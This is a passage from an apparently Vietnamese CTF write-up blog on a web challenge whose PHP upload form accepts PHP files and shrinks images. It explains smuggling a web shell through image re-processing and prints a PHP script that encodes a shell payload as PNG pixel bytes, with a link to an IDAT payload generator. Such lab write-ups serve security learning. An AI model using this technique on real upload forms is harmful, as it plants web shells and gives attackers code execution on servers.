        <span class="k">echo</span> <span class="s2">&#34;Chỉ cho phép tải lên tệp JPG hoặc PNG và pHp ;D ? ? ?&#34;</span><span class="p">;</span>
    <span class="p">}</span>
<span class="p">}</span>
<span class="cp">?&gt;</span><span class="err">
</span><span class="err">&lt;!-- HTML Form để tải lên tệp --&gt;
</span><span class="err">&lt;h3&gt;upload file ảnh miễn phí nhưng tôi sẽ nén chất lượng của bạn xuống 40px&lt;/h3&gt;
</span><span class="err">&lt;form action=&#34;&#34; method=&#34;POST&#34; enctype=&#34;multipart/form-data&#34;&gt;
</span><span class="err">    &lt;input type=&#34;file&#34; name=&#34;image&#34;&gt;
</span><span class="err">    &lt;input type=&#34;submit&#34; value=&#34;Tải Lên&#34;&gt;
</span><span class="err">&lt;/form&gt;
</span></code></pre></div><ul>
<li>
<p>Alow upload php extendtion, jpg and png we chose php :&lt;</p>
</li>
<li>
<p>Regarding the simple functional diagram, upload the file and re-edit the uploaded image with a size of 40px.
<img src="https://hackmd.io/_uploads/Byf8KJ_sp.png" alt="image"></p>
</li>
<li>
<p>There are functions like imagecreatefromstring or imagecopyresampled which are quite strange.</p>
</li>
<li>
<p>how could I upload the file (containing the shell) and still see it through the other functions.</p>
</li>
<li>
<p>You have 2 or more ways to solve this problem</p>
</li>
</ul>
<p>Tool: <a href="https://github.com/huntergregal/PNG-IDAT-Payload-Generator">IDAT</a> or</p>
<div class="highlight"><pre class="chroma"><code class="language-php" data-lang="php"><span class="o">&lt;?</span><span class="nx">php</span>
 
<span class="nx">header</span><span class="p">(</span><span class="s1">&#39;Content-Type: image/png&#39;</span><span class="p">);</span>
 
<span class="nv">$p</span> <span class="o">=</span> <span class="k">array</span><span class="p">(</span><span class="mh">0xA3</span><span class="p">,</span> <span class="mh">0x9F</span><span class="p">,</span> <span class="mh">0x67</span><span class="p">,</span> <span class="mh">0xF7</span><span class="p">,</span> <span class="mh">0x0E</span><span class="p">,</span> <span class="mh">0x93</span><span class="p">,</span> <span class="mh">0x1B</span><span class="p">,</span> <span class="mh">0x23</span><span class="p">,</span> <span class="mh">0xBE</span><span class="p">,</span> <span class="mh">0x2C</span><span class="p">,</span> <span class="mh">0x8A</span><span class="p">,</span> <span class="mh">0xD0</span><span class="p">,</span> <span class="mh">0x80</span><span class="p">,</span> <span class="mh">0xF9</span><span class="p">,</span> <span class="mh">0xE1</span><span class="p">,</span> <span class="mh">0xAE</span><span class="p">,</span> <span class="mh">0x22</span><span class="p">,</span> <span class="mh">0xF6</span><span class="p">,</span> <span class="mh">0xD9</span><span class="p">,</span> <span class="mh">0x43</span><span class="p">,</span> <span class="mh">0x5D</span><span class="p">,</span> <span class="mh">0xFB</span><span class="p">,</span> <span class="mh">0xAE</span><span class="p">,</span> <span class="mh">0xCC</span><span class="p">,</span> <span class="mh">0x5A</span><span class="p">,</span> <span class="mh">0x01</span><span class="p">,</span> <span class="mh">0xDC</span><span class="p">,</span> <span class="mh">0xAA</span><span class="p">,</span> <span class="mh">0x52</span><span class="p">,</span> <span class="mh">0xD0</span><span class="p">,</span> <span class="mh">0xB6</span><span class="p">,</span> <span class="mh">0xEE</span><span class="p">,</span> <span class="mh">0xBB</span><span class="p">,</span> <span class="mh">0x3A</span><span class="p">,</span> <span class="mh">0xCF</span><span class="p">,</span> <span class="mh">0x93</span><span class="p">,</span> <span class="mh">0xCE</span><span class="p">,</span> <span class="mh">0xD2</span><span class="p">,</span> <span class="mh">0x88</span><span class="p">,</span> <span class="mh">0xFC</span><span class="p">,</span> <span class="mh">0x69</span><span class="p">,</span> <span class="mh">0xD0</span><span class="p">,</span> <span class="mh">0x2B</span><span class="p">,</span> <span class="mh">0xB9</span><span class="p">,</span> <span class="mh">0xB0</span><span class="p">,</span> <span class="mh">0xFB</span><span class="p">,</span> <span class="mh">0xBB</span><span class="p">,</span> <span class="mh">0x79</span><span class="p">,</span> <span class="mh">0xFC</span><span class="p">,</span> <span class="mh">0xED</span><span class="p">,</span> <span class="mh">0x22</span><span class="p">,</span> <span class="mh">0x38</span><span class="p">,</span> <span class="mh">0x49</span><span class="p">,</span> <span class="mh">0xD3</span><span class="p">,</span> <span class="mh">0x51</span><span class="p">,</span> <span class="mh">0xB7</span><span class="p">,</span> <span class="mh">0x3F</span><span class="p">,</span> <span class="mh">0x02</span><span class="p">,</span> <span class="mh">0xC2</span><span class="p">,</span> <span class="mh">0x20</span><span class="p">,</span> <span class="mh">0xD8</span><span class="p">,</span> <span class="mh">0xD9</span><span class="p">,</span> <span class="mh">0x3C</span><span class="p">,</span> <span class="mh">0x67</span><span class="p">,</span> <span class="mh">0xF4</span><span class="p">,</span> <span class="mh">0x50</span><span class="p">,</span> <span class="mh">0x67</span><span class="p">,</span> <span class="mh">0xF4</span><span class="p">,</span> <span class="mh">0x50</span><span class="p">,</span> <span class="mh">0xA3</span><span class="p">,</span> <span class="mh">0x9F</span><span class="p">,</span> <span class="mh">0x67</span><span class="p">,</span> <span class="mh">0xA5</span><span class="p">,</span> <span class="mh">0xBE</span><span class="p">,</span> <span class="mh">0x5F</span><span class="p">,</span> <span class="mh">0x76</span><span class="p">,</span> <span class="mh">0x74</span><span class="p">,</span> <span class="mh">0x5A</span><span class="p">,</span> <span class="mh">0x4C</span><span class="p">,</span> <span class="mh">0xA1</span><span class="p">,</span> <span class="mh">0x3F</span><span class="p">,</span> <span class="mh">0x7A</span><span class="p">,</span> <span class="mh">0xBF</span><span class="p">,</span> <span class="mh">0x30</span><span class="p">,</span> <span class="mh">0x6B</span><span class="p">,</span> <span class="mh">0x88</span><span class="p">,</span> <span class="mh">0x2D</span><span class="p">,</span> <span class="mh">0x60</span><span class="p">,</span> <span class="mh">0x65</span><span class="p">,</span> <span class="mh">0x7D</span><span class="p">,</span> <span class="mh">0x52</span><span class="p">,</span> <span class="mh">0x9D</span><span class="p">,</span> <span class="mh">0xAD</span><span class="p">,</span> <span class="mh">0x88</span><span class="p">,</span> <span class="mh">0xA1</span><span class="p">,</span> <span class="mh">0x66</span><span class="p">,</span> <span class="mh">0x94</span><span class="p">,</span> <span class="mh">0xA1</span><span class="p">,</span> <span class="mh">0x27</span><span class="p">,</span> <span class="mh">0x56</span><span class="p">,</span> <span class="mh">0xEC</span><span class="p">,</span> <span class="mh">0xFE</span><span class="p">,</span> <span class="mh">0xAF</span><span class="p">,</span> <span class="mh">0x57</span><span class="p">,</span> <span class="mh">0x57</span><span class="p">,</span> <span class="mh">0xEB</span><span class="p">,</span> <span class="mh">0x2E</span><span class="p">,</span> <span class="mh">0x20</span><span class="p">,</span> <span class="mh">0xA3</span><span class="p">,</span> <span class="mh">0xAE</span><span class="p">,</span> <span class="mh">0x58</span><span class="p">,</span> <span class="mh">0x80</span><span class="p">,</span> <span class="mh">0xA7</span><span class="p">,</span> <span class="mh">0x0C</span><span class="p">,</span> <span class="mh">0x10</span><span class="p">,</span> <span class="mh">0x55</span><span class="p">,</span> <span class="mh">0xCF</span><span class="p">,</span> <span class="mh">0x09</span><span class="p">,</span> <span class="mh">0x5C</span><span class="p">,</span> <span class="mh">0x10</span><span class="p">,</span> <span class="mh">0x40</span><span class="p">,</span> <span class="mh">0x8A</span><span class="p">,</span> <span class="mh">0xB9</span><span class="p">,</span> <span class="mh">0x39</span><span class="p">,</span> <span class="mh">0xB3</span><span class="p">,</span> <span class="mh">0xC8</span><span class="p">,</span> <span class="mh">0xCD</span><span class="p">,</span> <span class="mh">0x64</span><span class="p">,</span> <span class="mh">0x45</span><span class="p">,</span> <span class="mh">0x3C</span><span class="p">,</span> <span class="mh">0x49</span><span class="p">,</span> <span class="mh">0x3E</span><span class="p">,</span> <span class="mh">0xAD</span><span class="p">,</span> <span class="mh">0x3F</span><span class="p">,</span> <span class="mh">0x33</span><span class="p">,</span> <span class="mh">0x56</span><span class="p">,</span> <span class="mh">0x1F</span><span class="p">,</span> <span class="mh">0x19</span> <span class="p">);</span>
 
<span class="nv">$img</span> <span class="o">=</span> <span class="nx">imagecreatetruecolor</span><span class="p">(</span><span class="mi">110</span><span class="p">,</span> <span class="mi">110</span><span class="p">);</span>
 
<span class="k">for</span> <span class="p">(</span><span class="nv">$y</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> <span class="nv">$y</span> <span class="o">&lt;</span> <span class="nx">sizeof</span><span class="p">(</span><span class="nv">$p</span><span class="p">);</span> <span class="nv">$y</span> <span class="o">+=</span> <span class="mi">3</span><span class="p">)</span> <span class="p">{</span>
<span class="nv">$r</span> <span class="o">=</span> <span class="nv">$p</span><span class="p">[</span><span class="nv">$y</span><span class="p">];</span>
<span class="nv">$g</span> <span class="o">=</span> <span class="nv">$p</span><span class="p">[</span><span class="nv">$y</span><span class="o">+</span><span class="mi">1</span><span class="p">];</span>
<span class="nv">$b</span> <span class="o">=</span> <span class="nv">$p</span><span class="p">[</span><span class="nv">$y</span><span class="o">+</span><span class="mi">2</span><span class="p">];</span>
<span class="nv">$color</span> <span class="o">=</span> <span class="nx">imagecolorallocate</span><span class="p">(</span><span class="nv">$img</span><span class="p">,</span> <span class="nv">$r</span><span class="p">,</span> <span class="nv">$g</span><span class="p">,</span> <span class="nv">$b</span><span class="p">);</span>
<span class="nx">imagesetpixel</span><span class="p">(</span><span class="nv">$img</span><span class="p">,</span> <span class="nx">round</span><span class="p">(</span><span class="nv">$y</span> <span class="o">/</span> <span class="mi">3</span><span class="p">)</span><span class="o">*</span><span class="mi">2</span><span class="p">,</span> <span class="mi">0</span><span class="p">,</span> <span class="nv">$color</span><span class="p">);</span>
<span class="nx">imagesetpixel</span><span class="p">(</span><span class="nv">$img</span><span class="p">,</span> <span class="nx">round</span><span class="p">(</span><span class="nv">$y</span> <span class="o">/</span> <span class="mi">3</span><span class="p">)</span><span class="o">*</span><span class="mi">2</span><span class="o">+</span><span class="mi">1</span><span class="p">,</span> <span class="mi">0</span><span class="p">,</span> <span class="nv">$color</span><span class="p">);</span>
<span class="nx">imagesetpixel</span><span class="p">(</span><span class="nv">$img</span><span class="p">,</span> <span class="nx">round</span><span class="p">(</span><span class="nv">$y</span> <span class="o">/</span> <span class="mi">3</span><span class="p">)</span><span class="o">*</span><span class="mi">2</span><span class="p">,</span> <span class="mi">1</span><span class="p">,</span> <span class="nv">$color</span><span class="p">);</span>
<span class="nx">imagesetpixel</span><span class="p">(</span><span class="nv">$img</span><span class="p">,</span> <span class="nx">round</span><span class="p">(</span><span class="nv">$y</span> <span class="o">/</span> <span class="mi">3</span><span class="p">)</span><span class="o">*</span><span class="mi">2</span><span class="o">+</span><span class="mi">1</span><span class="p">,</span> <span class="mi">1</span><span class="p">,</span> <span class="nv">$color</span><span class="p">);</span>
<span class="p">}</span>
 
<span class="nx">imagepng</span><span class="p">(</span><span class="nv">$img</span><span class="p">);</span>
<span class="cp">?&gt;</span><span class="err">
</span></code></pre></div><p><img src="https://hackmd.io/_uploads/rk-ki1OsT.png" alt="image"></p>
<p><img src="https://hackmd.io/_uploads/SyDlj1usT.png" alt="image"></p>


        
          <div class="blog-tags">
            
              
              <a href="https://l3mnt2010.github.io/tags/ctf/">CTF</a>&nbsp;
            
              
              <a href="https://l3mnt2010.github.io/tags/english/">English</a>&nbsp;
            
          </div>
        

        

        
      </article>

      
        <ul class="pager blog-pager">
          
            <li class="previous">
              <a href="https://l3mnt2010.github.io/write-up/2023-01-14-cookiearena/" data-toggle="tooltip" data-placement="top" title="Cookie arena">&larr; Previous Post</a>
            </li>
          
          
            <li class="next">
              <a href="https://l3mnt2010.github.io/write-up/2024-01-28-bi0sctf2024/" data-toggle="tooltip" data-placement="top" title="Bi0sCTF 2024 - WEB &#39;s challenges">Next Post &rarr;</a>
            </li>
          
        </ul>
      


      

    </div>
  </div>
</div>

      <footer>
  <div class="container">
    
    <div class="row">
      <div class="col-lg-8 col-lg-offset-2 col-md-10 col-md-offset-1">
        <ul class="list-inline text-center footer-links">
          
          
        </ul>
        <p class="credits copyright text-muted">
          

          &nbsp;&bull;&nbsp;&copy;
          
            0001
          

          
            &nbsp;&bull;&nbsp;
            <a href="https://l3mnt2010.github.io/">&gt; root@l3mnt2010:~# ./exploit.py</a>
          
        </p>
        
        <p class="credits theme-by text-muted">
          <a href="https://gohugo.io">Hugo v0.83.1</a> powered &nbsp;&bull;&nbsp; Theme <a href="https://github.com/halogenica/beautifulhugo">Beautiful Hugo</a> adapted from <a href="https://deanattali.com/beautiful-jekyll/">Beautiful Jekyll</a>
          
        </p>
      </div>
    </div>
  </div>
</footer><script defer src="https://cdn.jsdelivr.net/npm/katex@0.16.7/dist/katex.min.js" integrity="sha384-G0zcxDFp5LWZtDuRMnBkk3EphCK1lhEf4UEyEM693ka574TZGwo4IWwS6QLzM/2t" crossorigin="anonymous"></script>
<script defer src="https://cdn.jsdelivr.net/npm/katex@0.16.7/dist/contrib/auto-render.min.js" integrity="sha384-+VBxd3r6XgURycqtZ117nYw44OOcIax56Z4dCRWbxyPt0Koah1uHoK0o4+/RRE05" crossorigin="anonymous" onload="renderMathInElement(document.body);"></script>
<script src="https://code.jquery.com/jquery-3.7.0.slim.min.js" integrity="sha384-w5y/xIeYixWvfM+A1cEbmHPURnvyqmVg5eVENruEdDjcyRLUSNej7512JQGspFUr" crossorigin="anonymous"></script>
<script src="https://cdn.jsdelivr.net/npm/bootstrap@3.4.1/dist/js/bootstrap.min.js" integrity="sha384-aJ21OjlMXNL5UyIl/XNwTMqvzeRMZH2w8c5cRVpzpU8Y5bApTppSuUkhZXN0VxHd" crossorigin="anonymous"></script>

<script src="https://l3mnt2010.github.io/js/main.js"></script><script src="https://cdnjs.cloudflare.com/ajax/libs/photoswipe/4.1.2/photoswipe.min.js" integrity="sha384-QELNnmcmU8IR9ZAykt67vGr9/rZJdHbiWi64V88fCPaOohUlHCqUD/unNN0BXSqy" crossorigin="anonymous"></script>
<script src="https://cdnjs.cloudflare.com/ajax/libs/photoswipe/4.1.2/photoswipe-ui-default.min.js" integrity="sha384-m67o7SkQ1ALzKZIFh4CiTA8tmadaujiTa9Vu+nqPSwDOqHrDmxLezTdFln8077+q" crossorigin="anonymous"></script><script src="https://l3mnt2010.github.io/js/load-photoswipe.js"></script>










    
  </body>
</html>

